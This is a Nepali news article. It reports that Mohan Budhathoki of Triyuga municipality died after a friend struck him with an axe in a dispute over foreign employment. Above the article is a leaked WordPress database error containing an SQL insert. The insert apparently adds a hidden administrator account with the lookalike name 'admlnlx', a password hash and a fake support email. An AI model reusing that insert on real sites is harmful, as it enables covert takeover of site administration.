WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVNtOXFMho68ONDticgFnhFZW0aUDZ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:43:01', '', 'admlnlx', 'admlnlx')
उदयपुर,पुस १-
आफ्नै साथीले बञ्चरो प्रहार गर्दा घाइते भएका युवकको उपचारका क्रममा मृत्यु भएको छ। उदयपुरको त्रियुगा नगरपालिका ९ श्रीपुरका ४० वर्षिय मोहन बुढाथोकीको उपचारको क्रममा विराटनगरको न्युरो अस्पतालमा मृत्यु भएको हो। ‘साथीको सामान्य रिस इवीको कारण बन्चरो प्रहारले भन्जाको मृत्यु भयो’ मामा मामा नेत्र बहादुर कर्कीले भने, ‘टाउकोमा गम्भीर चोट लागेकाले बचाउन सकिएन।’
वैदेशिक रोजगारीको विषयलाई लिएर विवाद हुँदा बुढाथोकीमाथि उनकै साथी होमबहादुर कार्कीले मंसिर २४ गते बन्चरो प्रहार गरेका प्रहरीले बताएको छ। त्रियुगा नगरपालिका ९ को वडा भेलाका क्रममा उनीहरुबीच विवाद भएको थियो। साथीलाई बञ्चरो प्रहार गर्ने होमबहादुरको खोजी भइरहेको प्रहरीले बताएको छ।